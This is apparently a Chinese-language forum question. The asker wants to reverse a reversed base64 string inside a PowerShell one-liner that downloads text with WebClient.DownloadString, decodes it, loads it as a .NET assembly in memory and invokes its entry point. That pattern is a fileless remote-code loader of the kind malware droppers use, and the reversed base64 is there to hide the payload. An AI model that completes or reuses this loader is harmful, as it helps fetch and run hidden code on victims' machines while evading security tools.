使用DownloadString()
下载base64后,如何将base64还原回原始字符?
我已经反转了base64,但是现在在我的代码中,我需要将其反转回原始字符。
这是我的代码:
[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString(' here the Base64'))).EntryPoint.Invoke($null, $null)